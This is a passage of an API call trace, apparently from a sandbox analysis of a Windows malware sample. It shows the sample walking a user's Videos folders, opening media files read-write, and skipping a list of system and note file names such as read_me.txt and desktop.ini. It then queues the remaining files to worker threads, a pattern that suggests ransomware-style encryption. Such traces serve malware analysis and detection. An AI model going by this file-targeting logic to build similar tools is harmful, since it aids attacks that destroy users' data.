lpOverlapped=0x0) returned 1 [0078.545] WriteFile (in: hFile=0x7a4, lpBuffer=0x84afd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x84afd48*, lpNumberOfBytesWritten=0x84afd44*=0x4, lpOverlapped=0x0) returned 1 [0078.545] GetProcessHeap () returned 0x4f10000 [0078.545] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b610d8 | out: hHeap=0x4f10000) returned 1 [0078.545] GetProcessHeap () returned 0x4f10000 [0078.545] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0078.545] GetProcessHeap () returned 0x4f10000 [0078.545] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0078.545] CloseHandle (hObject=0x7a4) returned 1 [0078.546] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 33 [0078.546] GetProcessHeap () returned 0x4f10000 [0078.546] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8b20098 [0078.546] wnsprintfW (in: pszDest=0x8b20098, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*") returned 42 [0078.546] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*", lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2499eee0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x2499eee0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName=".", cAlternateFileName="")) returned 0x7cfe768 [0078.546] wnsprintfW (in: pszDest=0x8b20098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\.") returned 42 [0078.546] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2499eee0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x2499eee0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="..", cAlternateFileName="")) returned 1 [0078.546] wnsprintfW (in: pszDest=0x8b20098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\..") returned 43 [0078.546] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe51f38d0, ftCreationTime.dwHighDateTime=0x1d4d104, ftLastAccessTime.dwLowDateTime=0x24d57140, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24d57140, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="5M36w1U 5ymSEb", cAlternateFileName="5M36W1~1")) returned 1 [0078.546] wnsprintfW (in: pszDest=0x8b20098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5M36w1U 5ymSEb") returned 55 [0078.546] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3684e0e0, ftCreationTime.dwHighDateTime=0x1d4d4c9, ftLastAccessTime.dwLowDateTime=0x3000c0f0, ftLastAccessTime.dwHighDateTime=0x1d4cee7, ftLastWriteTime.dwLowDateTime=0x3000c0f0, ftLastWriteTime.dwHighDateTime=0x1d4cee7, nFileSizeHigh=0x0, nFileSizeLow=0x140a7, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="ALs9oCV.swf", cAlternateFileName="")) returned 1 [0078.546] wnsprintfW (in: pszDest=0x8b20098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ALs9oCV.swf") returned 52 [0078.546] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ALs9oCV.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\als9ocv.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7f8 [0078.546] StrStrW (lpFirst="als9ocv.swf", lpSrch="read_me.txt") returned 0x0 [0078.546] StrStrW (lpFirst="als9ocv.swf", lpSrch="autoexec.bat") returned 0x0 [0078.547] StrStrW (lpFirst="als9ocv.swf", lpSrch="desktop.ini") returned 0x0 [0078.547] StrStrW (lpFirst="als9ocv.swf", lpSrch="autorun.inf") returned 0x0 [0078.547] StrStrW (lpFirst="als9ocv.swf", lpSrch="ntuser.dat") returned 0x0 [0078.547] StrStrW (lpFirst="als9ocv.swf", lpSrch="iconcache.db") returned 0x0 [0078.547] StrStrW (lpFirst="als9ocv.swf", lpSrch="bootsect.bak") returned 0x0 [0078.547] StrStrW (lpFirst="als9ocv.swf", lpSrch="boot.ini") returned 0x0 [0078.547] StrStrW (lpFirst="als9ocv.swf", lpSrch="ntuser.dat.log") returned 0x0 [0078.547] StrStrW (lpFirst="als9ocv.swf", lpSrch="thumbs.db") returned 0x0 [0078.547] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 178 [0078.547] QueueUserWorkItem (Function=0x404e00, Context=0x7f8, Flags=0x0) returned 1 [0078.547] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0078.547] wnsprintfW (in: pszDest=0x8b20098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini") returned 52 [0078.547] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7f4 [0078.547] StrStrW (lpFirst="desktop.ini", lpSrch="read_me.txt") returned 0x0 [0078.547] StrStrW (lpFirst="desktop.ini", lpSrch="autoexec.bat") returned 0x0 [0078.547] StrStrW (lpFirst="desktop.ini", lpSrch="desktop.ini") returned="desktop.ini" [0078.547] CloseHandle (hObject=0x7f4) returned 1 [0078.547] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe903a240, ftCreationTime.dwHighDateTime=0x1d4cd0f, ftLastAccessTime.dwLowDateTime=0x488a6660, ftLastAccessTime.dwHighDateTime=0x1d4c5b1, ftLastWriteTime.dwLowDateTime=0x488a6660, ftLastWriteTime.dwHighDateTime=0x1d4c5b1, nFileSizeHigh=0x0, nFileSizeLow=0x5989, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="ElUpMiVOtav5PaLlw5.swf", cAlternateFileName="ELUPMI~1.SWF")) returned 1 [0078.547] wnsprintfW (in: pszDest=0x8b20098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ElUpMiVOtav5PaLlw5.swf") returned 63 [0078.547] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ElUpMiVOtav5PaLlw5.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\elupmivotav5pallw5.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7f4 [0078.547] StrStrW (lpFirst="elupmivotav5pallw5.swf", lpSrch="read_me.txt") returned 0x0 [0078.547] StrStrW (lpFirst="elupmivotav5pallw5.swf", lpSrch="autoexec.bat") returned 0x0 [0078.548] StrStrW (lpFirst="elupmivotav5pallw5.swf", lpSrch="desktop.ini") returned 0x0 [0078.548] StrStrW (lpFirst="elupmivotav5pallw5.swf", lpSrch="autorun.inf") returned 0x0 [0078.548] StrStrW (lpFirst="elupmivotav5pallw5.swf", lpSrch="ntuser.dat") returned 0x0 [0078.548] StrStrW (lpFirst="elupmivotav5pallw5.swf", lpSrch="iconcache.db") returned 0x0 [0078.548] StrStrW (lpFirst="elupmivotav5pallw5.swf", lpSrch="bootsect.bak") returned 0x0 [0078.548] StrStrW (lpFirst="elupmivotav5pallw5.swf", lpSrch="boot.ini") returned 0x0 [0078.548] StrStrW (lpFirst="elupmivotav5pallw5.swf", lpSrch="ntuser.dat.log") returned 0x0 [0078.548] StrStrW (lpFirst="elupmivotav5pallw5.swf", lpSrch="thumbs.db") returned 0x0 [0078.548] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 179 [0078.548] QueueUserWorkItem (Function=0x404e00, Context=0x7f4, Flags=0x0) returned 1 [0078.548] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x660a7d30, ftCreationTime.dwHighDateTime=0x1d4cd9d, ftLastAccessTime.dwLowDateTime=0xeeeb6bb0, ftLastAccessTime.dwHighDateTime=0x1d4c8ec, ftLastWriteTime.dwLowDateTime=0xeeeb6bb0, ftLastWriteTime.dwHighDateTime=0x1d4c8ec, nFileSizeHigh=0x0, nFileSizeLow=0xcbc9, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="G4dr.mkv", cAlternateFileName="")) returned 1 [0078.548] wnsprintfW (in: pszDest=0x8b20098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\G4dr.mkv") returned 49 [0078.548] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\G4dr.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\g4dr.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7f0 [0078.548] StrStrW (lpFirst="g4dr.mkv", lpSrch="read_me.txt") returned 0x0 [0078.548] StrStrW (lpFirst="g4dr.mkv", lpSrch="autoexec.bat") returned 0x0 [0078.548] StrStrW (lpFirst="g4dr.mkv", lpSrch="desktop.ini") returned 0x0 [0078.548] StrStrW (lpFirst="g4dr.mkv", lpSrch="autorun.inf") returned 0x0 [0078.548] StrStrW (lpFirst="g4dr.mkv", lpSrch="ntuser.dat") returned 0x0 [0078.548] StrStrW (lpFirst="g4dr.mkv", lpSrch="iconcache.db") returned 0x0 [0078.548] StrStrW (lpFirst="g4dr.mkv", lpSrch="bootsect.bak") returned 0x0 [0078.548] StrStrW (lpFirst="g4dr.mkv", lpSrch="boot.ini") returned 0x0 [0078.548] StrStrW (lpFirst="g4dr.mkv", lpSrch="ntuser.dat.log") returned 0x0 [0078.549] StrStrW (lpFirst="g4dr.mkv", lpSrch="thumbs.db") returned 0x0 [0078.549] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 180 [0078.549] QueueUserWorkItem (Function=0x404e00, Context=0x7f0, Flags=0x0) returned 1 [0078.549] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8230db70, ftCreationTime.dwHighDateTime=0x1d4d44c, ftLastAccessTime.dwLowDateTime=0x24dc9560, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24dc9560, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="LeWhSQT", cAlternateFileName="")) returned 1 [0078.549] wnsprintfW (in: pszDest=0x8b20098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\LeWhSQT") returned 48 [0078.549] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeaaa14d0, ftCreationTime.dwHighDateTime=0x1d4ca26, ftLastAccessTime.dwLowDateTime=0x7bab5080, ftLastAccessTime.dwHighDateTime=0x1d4c599, ftLastWriteTime.dwLowDateTime=0x7bab5080, ftLastWriteTime.dwHighDateTime=0x1d4c599, nFileSizeHigh=0x0, nFileSizeLow=0x14dd0, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="mTmULUBUagOqv.mp4", cAlternateFileName="MTMULU~1.MP4")) returned 1 [0078.549] wnsprintfW (in: pszDest=0x8b20098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\mTmULUBUagOqv.mp4") returned 58 [0078.549] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\mTmULUBUagOqv.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\mtmulubuagoqv.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7ec [0078.549] StrStrW (lpFirst="mtmulubuagoqv.mp4", lpSrch="read_me.txt") returned 0x0 [0078.549] StrStrW (lpFirst="mtmulubuagoqv.mp4", lpSrch="autoexec.bat") returned 0x0 [0078.549] StrStrW (lpFirst="mtmulubuagoqv.mp4", lpSrch="desktop.ini") returned 0x0 [0078.549] StrStrW (lpFirst="mtmulubuagoqv.mp4", lpSrch="autorun.inf") returned 0x0 [0078.549] StrStrW (lpFirst="mtmulubuagoqv.mp4", lpSrch="ntuser.dat") returned 0x0 [0078.549] StrStrW (lpFirst="mtmulubuagoqv.mp4", lpSrch="iconcache.db") returned 0x0 [0078.549] StrStrW (lpFirst="mtmulubuagoqv.mp4", lpSrch="bootsect.bak") returned 0x0 [0078.549] StrStrW (lpFirst="mtmulubuagoqv.mp4", lpSrch="boot.ini") returned 0x0 [0078.549] StrStrW (lpFirst="mtmulubuagoqv.mp4", lpSrch="ntuser.dat.log") returned 0x0 [0078.549] StrStrW (lpFirst="mtmulubuagoqv.mp4", lpSrch="thumbs.db") returned 0x0 [0078.549] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 181 [0078.549] QueueUserWorkItem (Function=0x404e00, Context=0x7ec, Flags=0x0) returned 1 [0078.549] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2499eee0, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x2499eee0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x2499eee0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0078.549] wnsprintfW (in: pszDest=0x8b20098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\read_me.txt") returned 52 [0078.549] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7e8 [0078.550] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0078.550] CloseHandle (hObject=0x7e8) returned 1 [0078.550] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd5f66dd0, ftCreationTime.dwHighDateTime=0x1d4cf4f, ftLastAccessTime.dwLowDateTime=0x24e15820, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24e15820, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="Sn6Fn", cAlternateFileName="")) returned 1 [0078.550] wnsprintfW (in: pszDest=0x8b20098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Sn6Fn") returned 46 [0078.550] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xde4e3390, ftCreationTime.dwHighDateTime=0x1d4d284, ftLastAccessTime.dwLowDateTime=0x24e15820, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24e15820, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="wD9B", cAlternateFileName="")) returned 1 [0078.550] wnsprintfW (in: pszDest=0x8b20098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wD9B") returned 45 [0078.550] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd393e160, ftCreationTime.dwHighDateTime=0x1d4d460, ftLastAccessTime.dwLowDateTime=0x24e15820, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24e15820, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="xwJZblUZL", cAlternateFileName="XWJZBL~1")) returned 1 [0078.550] wnsprintfW (in: pszDest=0x8b20098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xwJZblUZL") returned 50 [0078.550] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd393e160, ftCreationTime.dwHighDateTime=0x1d4d460, ftLastAccessTime.dwLowDateTime=0x24e15820, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24e15820, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="xwJZblUZL", cAlternateFileName="XWJZBL~1")) returned 0 [0078.550] FindClose (in: hFindFile=0x7cfe768 | out: hFindFile=0x7cfe768) returned 1 [0078.550] wnsprintfW (in: pszDest=0x8b20098, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\read_me.txt") returned 52 [0078.550] GetProcessHeap () returned 0x4f10000 [0078.550] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b20098 | out: hHeap=0x4f10000) returned 1 [0078.550] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 87 [0078.550] GetProcessHeap () returned 0x4f10000 [0078.550] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8de1100 | out: hHeap=0x4f10000) returned 1 [0078.550] GetProcessHeap () returned 0x4f10000 [0078.550] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8b20098 [0078.550] wnsprintfW (in: pszDest=0x8b20098, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5M36w1U 5ymSEb\\*") returned 57 [0078.579] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5M36w1U 5ymSEb\\*", lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe51f38d0, ftCreationTime.dwHighDateTime=0x1d4d104, ftLastAccessTime.dwLowDateTime=0x24d57140, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24d57140, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName=".", cAlternateFileName="")) returned 0x7cfe768 [0078.579] wnsprintfW (in: pszDest=0x8b20098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5M36w1U 5ymSEb\\.") returned 57 [0078.579] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe51f38d0, ftCreationTime.dwHighDateTime=0x1d4d104, ftLastAccessTime.dwLowDateTime=0x24d57140, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24d57140, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="..", cAlternateFileName="")) returned 1 [0078.579] wnsprintfW (in: pszDest=0x8b20098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5M36w1U 5ymSEb\\..") returned 58 [0078.579] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3b32f50, ftCreationTime.dwHighDateTime=0x1d4d221, ftLastAccessTime.dwLowDateTime=0x17bfa230, ftLastAccessTime.dwHighDateTime=0x1d4c682, ftLastWriteTime.dwLowDateTime=0x17bfa230, ftLastWriteTime.dwHighDateTime=0x1d4c682, nFileSizeHigh=0x0, nFileSizeLow=0x5597, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="-bV2q.swf", cAlternateFileName="")) returned 1 [0078.579] wnsprintfW (in: pszDest=0x8b20098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5M36w1U 5ymSEb\\-bV2q.swf") returned 65 [0078.579] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5M36w1U 5ymSEb\\-bV2q.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\5m36w1u 5ymseb\\-bv2q.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7d0 [0078.579] StrStrW (lpFirst="-bv2q.swf", lpSrch="read_me.txt") returned 0x0 [0078.579] StrStrW (lpFirst="-bv2q.swf", lpSrch="autoexec.bat") returned 0x0 [0078.579] StrStrW (lpFirst="-bv2q.swf", lpSrch="desktop.ini") returned 0x0 [0078.579] StrStrW (lpFirst="-bv2q.swf", lpSrch="autorun.inf") returned 0x0 [0078.579] StrStrW (lpFirst="-bv2q.swf", lpSrch="ntuser.dat") returned 0x0 [0078.579] StrStrW (lpFirst="-bv2q.swf", lpSrch="iconcache.db") returned 0x0 [0078.579] StrStrW (lpFirst="-bv2q.swf", lpSrch="bootsect.bak") returned 0x0 [0078.579] StrStrW (lpFirst="-bv2q.swf", lpSrch="boot.ini") returned 0x0 [0078.579] StrStrW (lpFirst="-bv2q.swf", lpSrch="ntuser.dat.log") returned 0x0 [0078.579] StrStrW (lpFirst="-bv2q.swf", lpSrch="thumbs.db") returned 0x0 [0078.580] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 188 [0078.580] QueueUserWorkItem (Function=0x404e00, Context=0x7d0, Flags=0x0) returned 1 [0078.580] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadd00c30, ftCreationTime.dwHighDateTime=0x1d4cdd8, ftLastAccessTime.dwLowDateTime=0x7da357c0, ftLastAccessTime.dwHighDateTime=0x1d4d3c2, ftLastWriteTime.dwLowDateTime=0x7da357c0, ftLastWriteTime.dwHighDateTime=0x1d4d3c2, nFileSizeHigh=0x0, nFileSizeLow=0x82a4, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="0RGelJCdJIVq8dRZcY.mp4", cAlternateFileName="0RGELJ~1.MP4")) returned 1 [0078.580] wnsprintfW (in: pszDest=0x8b20098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5M36w1U 5ymSEb\\0RGelJCdJIVq8dRZcY.mp4") returned 78 [0078.580] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5M36w1U 5ymSEb\\0RGelJCdJIVq8dRZcY.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\5m36w1u 5ymseb\\0rgeljcdjivq8drzcy.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7cc [0078.580] StrStrW (lpFirst="0rgeljcdjivq8drzcy.mp4", lpSrch="read_me.txt") returned 0x0 [0078.580] StrStrW (lpFirst="0rgeljcdjivq8drzcy.mp4", lpSrch="autoexec.bat") returned 0x0 [0078.580] StrStrW (lpFirst="0rgeljcdjivq8drzcy.mp4", lpSrch="desktop.ini") returned 0x0 [0078.580] StrStrW (lpFirst="0rgeljcdjivq8drzcy.mp4", lpSrch="autorun.inf") returned 0x0 [0078.580] StrStrW (lpFirst="0rgeljcdjivq8drzcy.mp4", lpSrch="ntuser.dat") returned 0x0 [0078.580] StrStrW (lpFirst="0rgeljcdjivq8drzcy.mp4", lpSrch="iconcache.db") returned 0x0 [0078.580] StrStrW (lpFirst="0rgeljcdjivq8drzcy.mp4", lpSrch="bootsect.bak") returned 0x0 [0078.580] StrStrW (lpFirst="0rgeljcdjivq8drzcy.mp4", lpSrch="boot.ini") returned 0x0 [0078.580] StrStrW (lpFirst="0rgeljcdjivq8drzcy.mp4", lpSrch="ntuser.dat.log") returned 0x0 [0078.580] StrStrW (lpFirst="0rgeljcdjivq8drzcy.mp4", lpSrch="thumbs.db") returned 0x0 [0078.580] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 189 [0078.580] QueueUserWorkItem (Function=0x404e00, Context=0x7cc, Flags=0x0) returned 1 [0078.580] FindNextFileW (in: hFindFile=0x7cfe768, 